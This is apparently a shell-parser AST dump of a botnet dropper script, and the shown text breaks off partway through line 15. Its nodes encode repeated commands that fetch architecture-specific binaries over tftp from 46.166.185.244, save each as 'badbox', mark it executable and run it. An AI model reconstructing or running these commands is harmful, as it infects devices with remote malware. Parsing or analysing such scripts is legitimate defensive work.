CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 180), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 139), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 123), word='46.166.185.244'),
    WordNode(lineno=4, pos=(124, 126), word='-c'),
    WordNode(lineno=4, pos=(127, 130), word='get'),
    WordNode(lineno=4, pos=(131, 139), word='pl0xmips'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(139, 140)),
  CommandNode(lineno=4, pos=(140, 160), parts=[
    WordNode(lineno=4, pos=(140, 143), word='cat'),
    WordNode(lineno=4, pos=(144, 152), word='pl0xmips'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(154, 160), word='badbox'), pos=(153, 160), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(160, 161)),
  CommandNode(lineno=4, pos=(161, 171), parts=[
    WordNode(lineno=4, pos=(161, 166), word='chmod'),
    WordNode(lineno=4, pos=(167, 169), word='+x'),
    WordNode(lineno=4, pos=(170, 171), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(171, 172)),
  CommandNode(lineno=4, pos=(172, 180), parts=[
    WordNode(lineno=4, pos=(172, 180), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(181, 316), parts=[
  CommandNode(lineno=5, pos=(181, 188), parts=[
    WordNode(lineno=5, pos=(181, 183), word='cd'),
    WordNode(lineno=5, pos=(184, 188), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(189, 191)),
  CommandNode(lineno=5, pos=(192, 203), parts=[
    WordNode(lineno=5, pos=(192, 194), word='cd'),
    WordNode(lineno=5, pos=(195, 203), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(204, 206)),
  CommandNode(lineno=5, pos=(207, 214), parts=[
    WordNode(lineno=5, pos=(207, 209), word='cd'),
    WordNode(lineno=5, pos=(210, 214), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(215, 217)),
  CommandNode(lineno=5, pos=(218, 226), parts=[
    WordNode(lineno=5, pos=(218, 220), word='cd'),
    WordNode(lineno=5, pos=(221, 226), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(227, 229)),
  CommandNode(lineno=5, pos=(230, 234), parts=[
    WordNode(lineno=5, pos=(230, 232), word='cd'),
    WordNode(lineno=5, pos=(233, 234), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(234, 235)),
  CommandNode(lineno=5, pos=(236, 273), parts=[
    WordNode(lineno=5, pos=(236, 240), word='tftp'),
    WordNode(lineno=5, pos=(241, 255), word='46.166.185.244'),
    WordNode(lineno=5, pos=(256, 258), word='-c'),
    WordNode(lineno=5, pos=(259, 262), word='get'),
    WordNode(lineno=5, pos=(263, 273), word='pl0xmipsel'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(273, 274)),
  CommandNode(lineno=5, pos=(274, 296), parts=[
    WordNode(lineno=5, pos=(274, 277), word='cat'),
    WordNode(lineno=5, pos=(278, 288), word='pl0xmipsel'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(290, 296), word='badbox'), pos=(289, 296), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(296, 297)),
  CommandNode(lineno=5, pos=(297, 307), parts=[
    WordNode(lineno=5, pos=(297, 302), word='chmod'),
    WordNode(lineno=5, pos=(303, 305), word='+x'),
    WordNode(lineno=5, pos=(306, 307), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(307, 308)),
  CommandNode(lineno=5, pos=(308, 316), parts=[
    WordNode(lineno=5, pos=(308, 316), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(317, 446), parts=[
  CommandNode(lineno=6, pos=(317, 324), parts=[
    WordNode(lineno=6, pos=(317, 319), word='cd'),
    WordNode(lineno=6, pos=(320, 324), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(325, 327)),
  CommandNode(lineno=6, pos=(328, 339), parts=[
    WordNode(lineno=6, pos=(328, 330), word='cd'),
    WordNode(lineno=6, pos=(331, 339), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(340, 342)),
  CommandNode(lineno=6, pos=(343, 350), parts=[
    WordNode(lineno=6, pos=(343, 345), word='cd'),
    WordNode(lineno=6, pos=(346, 350), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(351, 353)),
  CommandNode(lineno=6, pos=(354, 362), parts=[
    WordNode(lineno=6, pos=(354, 356), word='cd'),
    WordNode(lineno=6, pos=(357, 362), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(363, 365)),
  CommandNode(lineno=6, pos=(366, 370), parts=[
    WordNode(lineno=6, pos=(366, 368), word='cd'),
    WordNode(lineno=6, pos=(369, 370), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(370, 371)),
  CommandNode(lineno=6, pos=(372, 406), parts=[
    WordNode(lineno=6, pos=(372, 376), word='tftp'),
    WordNode(lineno=6, pos=(377, 391), word='46.166.185.244'),
    WordNode(lineno=6, pos=(392, 394), word='-c'),
    WordNode(lineno=6, pos=(395, 398), word='get'),
    WordNode(lineno=6, pos=(399, 406), word='pl0xsh4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(406, 407)),
  CommandNode(lineno=6, pos=(407, 426), parts=[
    WordNode(lineno=6, pos=(407, 410), word='cat'),
    WordNode(lineno=6, pos=(411, 418), word='pl0xsh4'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(420, 426), word='badbox'), pos=(419, 426), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(426, 427)),
  CommandNode(lineno=6, pos=(427, 437), parts=[
    WordNode(lineno=6, pos=(427, 432), word='chmod'),
    WordNode(lineno=6, pos=(433, 435), word='+x'),
    WordNode(lineno=6, pos=(436, 437), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(437, 438)),
  CommandNode(lineno=6, pos=(438, 446), parts=[
    WordNode(lineno=6, pos=(438, 446), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(447, 576), parts=[
  CommandNode(lineno=7, pos=(447, 454), parts=[
    WordNode(lineno=7, pos=(447, 449), word='cd'),
    WordNode(lineno=7, pos=(450, 454), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(455, 457)),
  CommandNode(lineno=7, pos=(458, 469), parts=[
    WordNode(lineno=7, pos=(458, 460), word='cd'),
    WordNode(lineno=7, pos=(461, 469), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(470, 472)),
  CommandNode(lineno=7, pos=(473, 480), parts=[
    WordNode(lineno=7, pos=(473, 475), word='cd'),
    WordNode(lineno=7, pos=(476, 480), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(481, 483)),
  CommandNode(lineno=7, pos=(484, 492), parts=[
    WordNode(lineno=7, pos=(484, 486), word='cd'),
    WordNode(lineno=7, pos=(487, 492), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(493, 495)),
  CommandNode(lineno=7, pos=(496, 500), parts=[
    WordNode(lineno=7, pos=(496, 498), word='cd'),
    WordNode(lineno=7, pos=(499, 500), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(500, 501)),
  CommandNode(lineno=7, pos=(502, 536), parts=[
    WordNode(lineno=7, pos=(502, 506), word='tftp'),
    WordNode(lineno=7, pos=(507, 521), word='46.166.185.244'),
    WordNode(lineno=7, pos=(522, 524), word='-c'),
    WordNode(lineno=7, pos=(525, 528), word='get'),
    WordNode(lineno=7, pos=(529, 536), word='pl0xx64'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(536, 537)),
  CommandNode(lineno=7, pos=(537, 556), parts=[
    WordNode(lineno=7, pos=(537, 540), word='cat'),
    WordNode(lineno=7, pos=(541, 548), word='pl0xx64'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(550, 556), word='badbox'), pos=(549, 556), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(556, 557)),
  CommandNode(lineno=7, pos=(557, 567), parts=[
    WordNode(lineno=7, pos=(557, 562), word='chmod'),
    WordNode(lineno=7, pos=(563, 565), word='+x'),
    WordNode(lineno=7, pos=(566, 567), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(567, 568)),
  CommandNode(lineno=7, pos=(568, 576), parts=[
    WordNode(lineno=7, pos=(568, 576), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(577, 714), parts=[
  CommandNode(lineno=8, pos=(577, 584), parts=[
    WordNode(lineno=8, pos=(577, 579), word='cd'),
    WordNode(lineno=8, pos=(580, 584), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(585, 587)),
  CommandNode(lineno=8, pos=(588, 599), parts=[
    WordNode(lineno=8, pos=(588, 590), word='cd'),
    WordNode(lineno=8, pos=(591, 599), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(600, 602)),
  CommandNode(lineno=8, pos=(603, 610), parts=[
    WordNode(lineno=8, pos=(603, 605), word='cd'),
    WordNode(lineno=8, pos=(606, 610), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(611, 613)),
  CommandNode(lineno=8, pos=(614, 622), parts=[
    WordNode(lineno=8, pos=(614, 616), word='cd'),
    WordNode(lineno=8, pos=(617, 622), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(623, 625)),
  CommandNode(lineno=8, pos=(626, 630), parts=[
    WordNode(lineno=8, pos=(626, 628), word='cd'),
    WordNode(lineno=8, pos=(629, 630), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(630, 631)),
  CommandNode(lineno=8, pos=(632, 670), parts=[
    WordNode(lineno=8, pos=(632, 636), word='tftp'),
    WordNode(lineno=8, pos=(637, 651), word='46.166.185.244'),
    WordNode(lineno=8, pos=(652, 654), word='-c'),
    WordNode(lineno=8, pos=(655, 658), word='get'),
    WordNode(lineno=8, pos=(659, 670), word='kittyphones'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(670, 671)),
  CommandNode(lineno=8, pos=(671, 694), parts=[
    WordNode(lineno=8, pos=(671, 674), word='cat'),
    WordNode(lineno=8, pos=(675, 686), word='kittyphones'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(688, 694), word='badbox'), pos=(687, 694), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(694, 695)),
  CommandNode(lineno=8, pos=(695, 705), parts=[
    WordNode(lineno=8, pos=(695, 700), word='chmod'),
    WordNode(lineno=8, pos=(701, 703), word='+x'),
    WordNode(lineno=8, pos=(704, 705), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(705, 706)),
  CommandNode(lineno=8, pos=(706, 714), parts=[
    WordNode(lineno=8, pos=(706, 714), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(715, 846), parts=[
  CommandNode(lineno=9, pos=(715, 722), parts=[
    WordNode(lineno=9, pos=(715, 717), word='cd'),
    WordNode(lineno=9, pos=(718, 722), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(723, 725)),
  CommandNode(lineno=9, pos=(726, 737), parts=[
    WordNode(lineno=9, pos=(726, 728), word='cd'),
    WordNode(lineno=9, pos=(729, 737), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(738, 740)),
  CommandNode(lineno=9, pos=(741, 748), parts=[
    WordNode(lineno=9, pos=(741, 743), word='cd'),
    WordNode(lineno=9, pos=(744, 748), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(749, 751)),
  CommandNode(lineno=9, pos=(752, 760), parts=[
    WordNode(lineno=9, pos=(752, 754), word='cd'),
    WordNode(lineno=9, pos=(755, 760), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(761, 763)),
  CommandNode(lineno=9, pos=(764, 768), parts=[
    WordNode(lineno=9, pos=(764, 766), word='cd'),
    WordNode(lineno=9, pos=(767, 768), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(768, 769)),
  CommandNode(lineno=9, pos=(770, 805), parts=[
    WordNode(lineno=9, pos=(770, 774), word='tftp'),
    WordNode(lineno=9, pos=(775, 789), word='46.166.185.244'),
    WordNode(lineno=9, pos=(790, 792), word='-c'),
    WordNode(lineno=9, pos=(793, 796), word='get'),
    WordNode(lineno=9, pos=(797, 805), word='pl0xi686'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(805, 806)),
  CommandNode(lineno=9, pos=(806, 826), parts=[
    WordNode(lineno=9, pos=(806, 809), word='cat'),
    WordNode(lineno=9, pos=(810, 818), word='pl0xi686'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(820, 826), word='badbox'), pos=(819, 826), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(826, 827)),
  CommandNode(lineno=9, pos=(827, 837), parts=[
    WordNode(lineno=9, pos=(827, 832), word='chmod'),
    WordNode(lineno=9, pos=(833, 835), word='+x'),
    WordNode(lineno=9, pos=(836, 837), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(837, 838)),
  CommandNode(lineno=9, pos=(838, 846), parts=[
    WordNode(lineno=9, pos=(838, 846), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(847, 976), parts=[
  CommandNode(lineno=10, pos=(847, 854), parts=[
    WordNode(lineno=10, pos=(847, 849), word='cd'),
    WordNode(lineno=10, pos=(850, 854), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(855, 857)),
  CommandNode(lineno=10, pos=(858, 869), parts=[
    WordNode(lineno=10, pos=(858, 860), word='cd'),
    WordNode(lineno=10, pos=(861, 869), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(870, 872)),
  CommandNode(lineno=10, pos=(873, 880), parts=[
    WordNode(lineno=10, pos=(873, 875), word='cd'),
    WordNode(lineno=10, pos=(876, 880), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(881, 883)),
  CommandNode(lineno=10, pos=(884, 892), parts=[
    WordNode(lineno=10, pos=(884, 886), word='cd'),
    WordNode(lineno=10, pos=(887, 892), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(893, 895)),
  CommandNode(lineno=10, pos=(896, 900), parts=[
    WordNode(lineno=10, pos=(896, 898), word='cd'),
    WordNode(lineno=10, pos=(899, 900), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(900, 901)),
  CommandNode(lineno=10, pos=(902, 936), parts=[
    WordNode(lineno=10, pos=(902, 906), word='tftp'),
    WordNode(lineno=10, pos=(907, 921), word='46.166.185.244'),
    WordNode(lineno=10, pos=(922, 924), word='-c'),
    WordNode(lineno=10, pos=(925, 928), word='get'),
    WordNode(lineno=10, pos=(929, 936), word='pl0xppc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(936, 937)),
  CommandNode(lineno=10, pos=(937, 956), parts=[
    WordNode(lineno=10, pos=(937, 940), word='cat'),
    WordNode(lineno=10, pos=(941, 948), word='pl0xppc'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(950, 956), word='badbox'), pos=(949, 956), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(956, 957)),
  CommandNode(lineno=10, pos=(957, 967), parts=[
    WordNode(lineno=10, pos=(957, 962), word='chmod'),
    WordNode(lineno=10, pos=(963, 965), word='+x'),
    WordNode(lineno=10, pos=(966, 967), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(967, 968)),
  CommandNode(lineno=10, pos=(968, 976), parts=[
    WordNode(lineno=10, pos=(968, 976), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(977, 1098), parts=[
  CommandNode(lineno=11, pos=(977, 984), parts=[
    WordNode(lineno=11, pos=(977, 979), word='cd'),
    WordNode(lineno=11, pos=(980, 984), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(985, 987)),
  CommandNode(lineno=11, pos=(988, 999), parts=[
    WordNode(lineno=11, pos=(988, 990), word='cd'),
    WordNode(lineno=11, pos=(991, 999), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1000, 1002)),
  CommandNode(lineno=11, pos=(1003, 1010), parts=[
    WordNode(lineno=11, pos=(1003, 1005), word='cd'),
    WordNode(lineno=11, pos=(1006, 1010), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1011, 1013)),
  CommandNode(lineno=11, pos=(1014, 1022), parts=[
    WordNode(lineno=11, pos=(1014, 1016), word='cd'),
    WordNode(lineno=11, pos=(1017, 1022), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1023, 1025)),
  CommandNode(lineno=11, pos=(1026, 1030), parts=[
    WordNode(lineno=11, pos=(1026, 1028), word='cd'),
    WordNode(lineno=11, pos=(1029, 1030), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1030, 1031)),
  CommandNode(lineno=11, pos=(1032, 1062), parts=[
    WordNode(lineno=11, pos=(1032, 1036), word='tftp'),
    WordNode(lineno=11, pos=(1037, 1051), word='46.166.185.244'),
    WordNode(lineno=11, pos=(1052, 1054), word='-c'),
    WordNode(lineno=11, pos=(1055, 1058), word='get'),
    WordNode(lineno=11, pos=(1059, 1062), word='ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1062, 1063)),
  CommandNode(lineno=11, pos=(1063, 1078), parts=[
    WordNode(lineno=11, pos=(1063, 1066), word='cat'),
    WordNode(lineno=11, pos=(1067, 1070), word='ftp'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1072, 1078), word='badbox'), pos=(1071, 1078), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1078, 1079)),
  CommandNode(lineno=11, pos=(1079, 1089), parts=[
    WordNode(lineno=11, pos=(1079, 1084), word='chmod'),
    WordNode(lineno=11, pos=(1085, 1087), word='+x'),
    WordNode(lineno=11, pos=(1088, 1089), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1089, 1090)),
  CommandNode(lineno=11, pos=(1090, 1098), parts=[
    WordNode(lineno=11, pos=(1090, 1098), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1099, 1222), parts=[
  CommandNode(lineno=12, pos=(1099, 1106), parts=[
    WordNode(lineno=12, pos=(1099, 1101), word='cd'),
    WordNode(lineno=12, pos=(1102, 1106), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1107, 1109)),
  CommandNode(lineno=12, pos=(1110, 1121), parts=[
    WordNode(lineno=12, pos=(1110, 1112), word='cd'),
    WordNode(lineno=12, pos=(1113, 1121), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1122, 1124)),
  CommandNode(lineno=12, pos=(1125, 1132), parts=[
    WordNode(lineno=12, pos=(1125, 1127), word='cd'),
    WordNode(lineno=12, pos=(1128, 1132), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1133, 1135)),
  CommandNode(lineno=12, pos=(1136, 1144), parts=[
    WordNode(lineno=12, pos=(1136, 1138), word='cd'),
    WordNode(lineno=12, pos=(1139, 1144), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1145, 1147)),
  CommandNode(lineno=12, pos=(1148, 1152), parts=[
    WordNode(lineno=12, pos=(1148, 1150), word='cd'),
    WordNode(lineno=12, pos=(1151, 1152), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1152, 1153)),
  CommandNode(lineno=12, pos=(1154, 1185), parts=[
    WordNode(lineno=12, pos=(1154, 1158), word='tftp'),
    WordNode(lineno=12, pos=(1159, 1173), word='46.166.185.244'),
    WordNode(lineno=12, pos=(1174, 1176), word='-c'),
    WordNode(lineno=12, pos=(1177, 1180), word='get'),
    WordNode(lineno=12, pos=(1181, 1185), word='pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1185, 1186)),
  CommandNode(lineno=12, pos=(1186, 1202), parts=[
    WordNode(lineno=12, pos=(1186, 1189), word='cat'),
    WordNode(lineno=12, pos=(1190, 1194), word='pftp'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1196, 1202), word='badbox'), pos=(1195, 1202), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1202, 1203)),
  CommandNode(lineno=12, pos=(1203, 1213), parts=[
    WordNode(lineno=12, pos=(1203, 1208), word='chmod'),
    WordNode(lineno=12, pos=(1209, 1211), word='+x'),
    WordNode(lineno=12, pos=(1212, 1213), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1213, 1214)),
  CommandNode(lineno=12, pos=(1214, 1222), parts=[
    WordNode(lineno=12, pos=(1214, 1222), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1223, 1356), parts=[
  CommandNode(lineno=13, pos=(1223, 1230), parts=[
    WordNode(lineno=13, pos=(1223, 1225), word='cd'),
    WordNode(lineno=13, pos=(1226, 1230), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1231, 1233)),
  CommandNode(lineno=13, pos=(1234, 1245), parts=[
    WordNode(lineno=13, pos=(1234, 1236), word='cd'),
    WordNode(lineno=13, pos=(1237, 1245), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1246, 1248)),
  CommandNode(lineno=13, pos=(1249, 1256), parts=[
    WordNode(lineno=13, pos=(1249, 1251), word='cd'),
    WordNode(lineno=13, pos=(1252, 1256), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1257, 1259)),
  CommandNode(lineno=13, pos=(1260, 1268), parts=[
    WordNode(lineno=13, pos=(1260, 1262), word='cd'),
    WordNode(lineno=13, pos=(1263, 1268), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1269, 1271)),
  CommandNode(lineno=13, pos=(1272, 1276), parts=[
    WordNode(lineno=13, pos=(1272, 1274), word='cd'),
    WordNode(lineno=13, pos=(1275, 1276), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1276, 1277)),
  CommandNode(lineno=13, pos=(1278, 1314), parts=[
    WordNode(lineno=13, pos=(1278, 1282), word='tftp'),
    WordNode(lineno=13, pos=(1283, 1297), word='46.166.185.244'),
    WordNode(lineno=13, pos=(1298, 1300), word='-c'),
    WordNode(lineno=13, pos=(1301, 1304), word='get'),
    WordNode(lineno=13, pos=(1305, 1314), word='pl0xsparc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1314, 1315)),
  CommandNode(lineno=13, pos=(1315, 1336), parts=[
    WordNode(lineno=13, pos=(1315, 1318), word='cat'),
    WordNode(lineno=13, pos=(1319, 1328), word='pl0xsparc'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1330, 1336), word='badbox'), pos=(1329, 1336), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1336, 1337)),
  CommandNode(lineno=13, pos=(1337, 1347), parts=[
    WordNode(lineno=13, pos=(1337, 1342), word='chmod'),
    WordNode(lineno=13, pos=(1343, 1345), word='+x'),
    WordNode(lineno=13, pos=(1346, 1347), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1347, 1348)),
  CommandNode(lineno=13, pos=(1348, 1356), parts=[
    WordNode(lineno=13, pos=(1348, 1356), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1357, 1478), parts=[
  CommandNode(lineno=14, pos=(1357, 1364), parts=[
    WordNode(lineno=14, pos=(1357, 1359), word='cd'),
    WordNode(lineno=14, pos=(1360, 1364), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1365, 1367)),
  CommandNode(lineno=14, pos=(1368, 1379), parts=[
    WordNode(lineno=14, pos=(1368, 1370), word='cd'),
    WordNode(lineno=14, pos=(1371, 1379), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1380, 1382)),
  CommandNode(lineno=14, pos=(1383, 1390), parts=[
    WordNode(lineno=14, pos=(1383, 1385), word='cd'),
    WordNode(lineno=14, pos=(1386, 1390), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1391, 1393)),
  CommandNode(lineno=14, pos=(1394, 1402), parts=[
    WordNode(lineno=14, pos=(1394, 1396), word='cd'),
    WordNode(lineno=14, pos=(1397, 1402), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1403, 1405)),
  CommandNode(lineno=14, pos=(1406, 1410), parts=[
    WordNode(lineno=14, pos=(1406, 1408), word='cd'),
    WordNode(lineno=14, pos=(1409, 1410), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1410, 1411)),
  CommandNode(lineno=14, pos=(1412, 1442), parts=[
    WordNode(lineno=14, pos=(1412, 1416), word='tftp'),
    WordNode(lineno=14, pos=(1417, 1431), word='46.166.185.244'),
    WordNode(lineno=14, pos=(1432, 1434), word='-c'),
    WordNode(lineno=14, pos=(1435, 1438), word='get'),
    WordNode(lineno=14, pos=(1439, 1442), word=' '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1442, 1443)),
  CommandNode(lineno=14, pos=(1443, 1458), parts=[
    WordNode(lineno=14, pos=(1443, 1446), word='cat'),
    WordNode(lineno=14, pos=(1447, 1450), word=' '),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1452, 1458), word='badbox'), pos=(1451, 1458), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1458, 1459)),
  CommandNode(lineno=14, pos=(1459, 1469), parts=[
    WordNode(lineno=14, pos=(1459, 1464), word='chmod'),
    WordNode(lineno=14, pos=(1465, 1467), word='+x'),
    WordNode(lineno=14, pos=(1468, 1469), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1469, 1470)),
  CommandNode(lineno=14, pos=(1470, 1478), parts=[
    WordNode(lineno=14, pos=(1470, 1478), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1479, 1608), parts=[
  CommandNode(lineno=15, pos=(1479, 1486), parts=[
    WordNode(lineno=15, pos=(1479, 1481), word='cd'),
    WordNode(lineno=15, pos=(1482, 1486), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1487, 1489)),
  CommandNode(lineno=15, pos=(1490, 1501), parts=[
    WordNode(lineno=15, pos=(1490, 1492), word='cd'),
    WordNode(lineno=15, pos=(1493, 1501), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1502, 1504)),
  CommandNode(lineno=15, pos=(1505, 1512), parts=[
    WordNode(lineno=15, pos=(1505, 1507), word='cd'),
    WordNode(lineno=15, pos=(1508, 1512), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1513, 1515)),
  CommandNode(lineno=15, pos=(1516, 1524), parts=[
    WordNode(lineno=15, pos=(1516, 1518), word='cd'),
    WordNode(lineno=15, pos=(1519, 1524), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1525, 1527)),
  CommandNode(lineno=15, pos=(1528, 1532), parts=[
    WordNode(lineno=15, pos=(1528, 1530), word='cd'),
    WordNode(lineno=15, pos=(1531, 1532), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1532, 1533)),
  CommandNode(lineno=15, pos=(1534, 1568), parts=[
    WordNode(lineno=15, pos=(1534, 1538), word='tftp'),
    WordNode(lineno=15, pos=(1539, 1553), word='46.166.185.244'),
    WordNode(lineno=15, pos=(1554, 1556), word='-c'),
    WordNode(lineno=15, pos=(1557, 1560), word='get'),
    WordNode(lineno=15, pos=(1561, 1568), word='apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1568, 1569)),
  CommandNode(lineno=15, pos=(1569, 1588), parts=[
    WordNode(lineno=15, pos=(1569, 1572), word='cat'),
    WordNode(lineno=15, pos=(1573, 1580), word='apache2'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1582, 1588), word='badbox'), pos=(1581, 1588), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1588, 1589)),
  CommandNode(lineno=15, pos=(1589, 1599), parts=[
